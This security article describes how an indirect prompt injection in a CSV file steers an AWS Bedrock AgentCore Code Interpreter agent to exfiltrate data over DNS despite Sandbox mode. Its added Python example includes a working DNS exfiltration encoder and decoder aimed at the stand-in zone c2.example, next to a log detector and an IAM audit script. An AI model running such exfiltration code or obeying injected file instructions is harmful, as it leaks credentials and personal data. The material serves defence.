🎯 Researchers have shown that the AWS Bedrock AgentCore Code Interpreter can still resolve DNS names even in its restricted Sandbox network mode, which lets an attacker who has smuggled instructions into an agent's input exfiltrate data through DNS queries. Over-broad IAM roles on the interpreter compound the problem by letting one compromised agent reach every other agent in the account, so organizations need to review both the network mode and the role scope of every interpreter they run.
The Flaw
A recent report from Phantom Labs Research describes a weakness in the AWS Bedrock AgentCore Code Interpreter that lets attackers exfiltrate sensitive data from AI-powered environments through DNS queries. The interpreter's Sandbox network mode blocks general outbound traffic, but DNS resolution stays enabled, so any code the agent runs can still push data out by encoding it into the names it looks up. Combined with instructions hidden in files the agent is asked to process, this yields a covert command-and-control channel that the network restriction was expected to rule out.
The attack begins with a malicious CSV file. When the agent is asked to analyze it, instructions embedded in the file (an indirect prompt injection) steer the Python code the agent generates: instead of performing the requested analysis, the code encodes data into subdomain labels and resolves them under an attacker-controlled domain, whose authoritative name server records every query. Because DNS responses travel back along the same path, the channel also serves for command and control. The researchers report executing commands, listing Amazon S3 buckets, and extracting credentials and personal data from the environment this way.
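The channel described above, and the detection logic a defender would run against resolver query logs, as an added example that is not code from the original article or from Phantom Labs Research. The zone c2.example, the secret string, the log records (shaped like a subset of Route 53 Resolver query-log fields, an assumption about that format) and the thresholds are all constructed for illustration. The detector generalizes beyond the CSV case: it scores any source that resolves many distinct, long-labelled names under one zone, which is what every DNS exfiltration tool produces regardless of how the code was injected.

```python
"""DNS exfiltration from a sandbox that only allows name resolution, and a
detector for it in resolver query logs.

Added example for this article; not code from the original page or from
Phantom Labs Research. The domain c2.example, the secret string, the log
records and the thresholds are all constructed for illustration.
"""
import base64
import json
import math
from collections import Counter, defaultdict

EXFIL_ZONE = "c2.example"   # attacker-controlled zone (constructed, not real)
MAX_LABEL = 63              # RFC 1035 limit for one label
MAX_NAME = 253              # RFC 1035 limit for a whole name


def encode_exfil_queries(data: bytes, zone: str = EXFIL_ZONE, chunk: int = 25) -> list[str]:
    """Split data into names of the form <seq>.<payload>.<zone>, one lookup each.

    base32 rather than base64: DNS labels are case-insensitive and resolvers
    may fold case in transit, which would corrupt base64. The resolver forwards
    each unknown name to the zone's authoritative server, so the query itself
    carries the data even when every other outbound port is closed.
    """
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    names = []
    for seq, start in enumerate(range(0, len(text), chunk)):
        payload = text[start:start + chunk]
        name = f"{seq}.{payload}.{zone}"
        if len(payload) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk does not fit in a DNS name")
        names.append(name)
    return names


def decode_exfil_queries(names: list[str]) -> bytes:
    """Reassemble what the attacker's name server sees, tolerating reordering."""
    chunks = {}
    for name in names:
        seq, payload = name.split(".")[:2]
        chunks[int(seq)] = payload
    text = "".join(chunks[i] for i in sorted(chunks)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_zone(qname: str) -> str:
    """Last two labels as the 'zone'; a production rule would use the public suffix list."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def find_dns_exfil(log_lines, min_distinct: int = 5, min_payload_len: int = 16) -> list[dict]:
    """Flag (source, zone) pairs that resolve many distinct names with long labels.

    Input lines are JSON records shaped like Route 53 Resolver query logs
    (only query_name and srcaddr are used; assumption about that format).
    Benign hosts repeat a few short names; an exfil channel emits a fresh long
    name per chunk, so distinct-name count and label length separate them.
    Entropy is reported for triage rather than used as a hard threshold.
    """
    names_by_pair = defaultdict(set)
    for line in log_lines:
        rec = json.loads(line)
        qname = rec["query_name"].rstrip(".").lower()
        names_by_pair[(rec["srcaddr"], registered_zone(qname))].add(qname)
    findings = []
    for (src, zone), names in names_by_pair.items():
        if len(names) < min_distinct:
            continue
        # the longest label below the zone is where a payload would sit
        payloads = [max(n[:-len(zone) - 1].split("."), key=len) for n in names]
        mean_len = sum(map(len, payloads)) / len(payloads)
        if mean_len < min_payload_len:
            continue
        findings.append({
            "srcaddr": src, "zone": zone, "distinct_names": len(names),
            "mean_payload_len": round(mean_len, 1),
            "mean_entropy": round(sum(map(shannon_entropy, payloads)) / len(payloads), 2),
        })
    return findings


def _record(qname: str, src: str) -> str:
    # Constructed record using a subset of the Resolver query-log field names.
    return json.dumps({"query_name": qname + ".", "query_type": "A", "rcode": "NOERROR", "srcaddr": src})


# Constructed sample: repeated benign lookups from one host, exfil traffic from another.
SECRET = b"db_password=not-a-real-secret; api_token=constructed-for-this-example-0123456789"
BENIGN_LINES = [_record(q, "10.0.1.10") for q in
                ["s3.us-east-1.amazonaws.com", "sts.amazonaws.com", "pypi.org", "files.pythonhosted.org"]] * 3
EXFIL_LINES = [_record(q, "10.0.1.23") for q in encode_exfil_queries(SECRET)]
SAMPLE_LOG = BENIGN_LINES + EXFIL_LINES

if __name__ == "__main__":
    for finding in find_dns_exfil(SAMPLE_LOG):
        print(finding)
```

Two practical caveats. First, this vantage point only exists in VPC mode: an interpreter in Sandbox mode resolves names through AWS-managed infrastructure, so its queries never appear in your resolver logs, which is another reason to move sensitive workloads to VPC mode. Second, the count and length thresholds are deliberately conservative; in production, tune them per zone and pair them with a Route 53 Resolver DNS Firewall allowlist so that names under unknown zones are refused rather than merely logged.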
What's at Risk
The damage an injected payload can do depends on the IAM execution role attached to the Code Interpreter: whatever the role can reach, the injected code can reach. Some deployments inherit roles designed for other services, granting far more access than the interpreter needs. The default AgentCore Starter Toolkit role, for instance, provides full access to DynamoDB and Secrets Manager, so a single poisoned file can turn into a credential and data breach.
The report also describes a condition it calls Agent God Mode, in which over-broad IAM permissions let one agent escalate privileges and compromise every other AgentCore agent in the AWS account. That turns the DNS channel into the first step of a multi-stage attack chain: the attacker can exfiltrate proprietary ECR images, read other agents' memories, and invoke every code interpreter in the account.
The practical lesson is that Sandbox mode does not mean no external network. A sandbox that can resolve arbitrary names has an outbound channel, low-bandwidth but sufficient for credentials and small files, and treating it as fully isolated leads straight to unauthorized data access and exfiltration. Organizations should read the mode's guarantees precisely rather than assuming the label.
AWS Response and Security Recommendations
In response to the findings, AWS stated that the observed behavior is intended functionality rather than a vulnerability. Instead of issuing a patch, AWS updated its documentation to clarify that Sandbox mode allows limited external network access, including DNS resolution. The control is therefore a customer responsibility: the network mode and the execution role must be chosen to fit the data the interpreter handles.
To mitigate the risk, administrators should first inventory every active AgentCore Code Interpreter instance and record its network mode and execution role. Any instance that handles sensitive data should be migrated from Sandbox mode to VPC mode, where its traffic egresses through the customer's VPC and is subject to security groups, Route 53 Resolver DNS Firewall rules and resolver query logging. Production agents should also run under custom, least-privilege IAM roles with named actions scoped to the agent's own resources; the roles generated by the starter toolkit are meant for experimentation and are not suitable for production.
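The inventory and role review described above, as an added example that is not code from the original article, from AWS, or from Phantom Labs Research. It also covers the Agent God Mode concern from the previous section by flagging unscoped grants on bedrock-agentcore itself. The interpreter records and the two policy documents are constructed; the broad one mirrors the shape the article warns about (full DynamoDB and Secrets Manager access on any resource), the scoped one is a least-privilege replacement. The function list_live_interpreters() assumes the boto3 service name bedrock-agentcore-control and its list/get operations; verify the response field names (networkConfiguration.networkMode, executionRoleArn) against your SDK version before relying on them.

```python
"""Audit AgentCore Code Interpreters for Sandbox network mode and over-broad
execution roles.

Added example for this article; not code from the original page, from AWS, or
from Phantom Labs Research. The interpreter records and policy documents are
constructed. list_live_interpreters() assumes the boto3 service name
'bedrock-agentcore-control' and its list/get operations (assumption).
"""
from typing import Iterable

# Services where a wildcard or unscoped grant on the execution role is a
# data-exposure risk, or, for bedrock-agentcore itself, a cross-agent risk.
SENSITIVE_SERVICES = {"dynamodb", "secretsmanager", "s3", "ecr", "bedrock-agentcore", "iam", "sts"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def policy_findings(policy: dict) -> list[str]:
    """One finding per sensitive grant: wildcard action, or any action on Resource *."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        unscoped = "*" in _as_list(stmt.get("Resource", []))
        for action in _as_list(stmt.get("Action", [])):
            service, _, verb = action.partition(":")
            if action == "*":
                findings.append("Action * granted; role can do anything it is allowed to touch")
            elif verb == "*" and service in SENSITIVE_SERVICES:
                findings.append(f"{action} on {'any resource' if unscoped else 'scoped resources'}")
            elif unscoped and service in SENSITIVE_SERVICES:
                findings.append(f"{action} on Resource *; scope it to this agent's own resources")
    return findings


def audit_interpreter(record: dict, role_policies: Iterable[dict]) -> dict:
    """Combine the interpreter's network mode with its execution role's grants."""
    mode = record.get("networkConfiguration", {}).get("networkMode", "UNKNOWN")
    issues = []
    if mode == "SANDBOX":
        issues.append("SANDBOX mode: outbound DNS resolution still works; use VPC mode for sensitive data")
    elif mode == "PUBLIC":
        issues.append("PUBLIC mode: unrestricted internet egress")
    for policy in role_policies:
        issues.extend(policy_findings(policy))
    return {"id": record.get("codeInterpreterId"), "role": record.get("executionRoleArn"),
            "networkMode": mode, "issues": issues}


def audit_all(records: Iterable[dict], policies_by_role: dict) -> list[dict]:
    return [audit_interpreter(r, policies_by_role.get(r.get("executionRoleArn"), [])) for r in records]


def list_live_interpreters(region: str) -> list[dict]:
    """Fetch every interpreter via the control-plane API (operation names are assumptions)."""
    import boto3  # imported here so the offline sample below runs without it
    ctl = boto3.client("bedrock-agentcore-control", region_name=region)
    records, kwargs = [], {}
    while True:
        page = ctl.list_code_interpreters(**kwargs)
        for summary in page.get("codeInterpreterSummaries", []):
            records.append(ctl.get_code_interpreter(codeInterpreterId=summary["codeInterpreterId"]))
        if not page.get("nextToken"):
            return records
        kwargs["nextToken"] = page["nextToken"]


# Constructed samples; account id and ARNs are placeholders.
BROAD_ROLE = "arn:aws:iam::123456789012:role/starter-toolkit-like-role"
SCOPED_ROLE = "arn:aws:iam::123456789012:role/report-agent-least-privilege"

# Shape of the default-style role the article warns about: full DynamoDB and
# Secrets Manager access, plus an unscoped AgentCore grant (constructed).
BROAD_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["dynamodb:*", "secretsmanager:*"], "Resource": "*"},
    {"Effect": "Allow", "Action": "bedrock-agentcore:*", "Resource": "*"},
    {"Effect": "Allow", "Action": ["logs:CreateLogStream", "logs:PutLogEvents"], "Resource": "*"},
]}

# Least-privilege replacement: named actions on the agent's own resources only.
SCOPED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["dynamodb:GetItem", "dynamodb:Query"],
     "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/report-agent-state"},
    {"Effect": "Allow", "Action": "secretsmanager:GetSecretValue",
     "Resource": "arn:aws:secretsmanager:us-east-1:123456789012:secret:report-agent/*"},
    {"Effect": "Allow", "Action": ["logs:CreateLogStream", "logs:PutLogEvents"], "Resource": "*"},
]}

SAMPLE_INTERPRETERS = [
    {"codeInterpreterId": "ci-sandbox-broad", "executionRoleArn": BROAD_ROLE,
     "networkConfiguration": {"networkMode": "SANDBOX"}},
    {"codeInterpreterId": "ci-vpc-scoped", "executionRoleArn": SCOPED_ROLE,
     "networkConfiguration": {"networkMode": "VPC"}},
]
POLICIES_BY_ROLE = {BROAD_ROLE: [BROAD_POLICY], SCOPED_ROLE: [SCOPED_POLICY]}

if __name__ == "__main__":
    for result in audit_all(SAMPLE_INTERPRETERS, POLICIES_BY_ROLE):
        print(result["id"], result["networkMode"], *result["issues"], sep="\n  ")
```

To run this against a real account, feed list_live_interpreters(region) into audit_all() together with the inline and attached policy documents of each execution role (fetched through the IAM API), and treat any result whose issues list is non-empty as a migration or role-rewrite ticket. Note that the checker only inspects the interpreter's own role; a role that is itself narrow but can call sts:AssumeRole into a broad one would need the same review one hop further.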
Broader Implications
The research highlights a broader challenge as AI systems gain the ability to execute code and interact with infrastructure: an agent that can run arbitrary code inherits every permission and every network path its runtime has, and an attacker who controls the agent's input controls that code. Without strict permission boundaries and network controls, automated agents will expose sensitive data without any human intending it.
The episode is a stark reminder that securing cloud environments becomes harder once AI systems are in the loop, and the Agent God Mode finding shows how quickly a single over-broad role turns one compromised agent into an account-wide compromise. Organizations using AWS Bedrock should treat interpreter network modes and execution roles as security boundaries, apply least-privilege IAM policies to them, and reassess that posture as the platform evolves.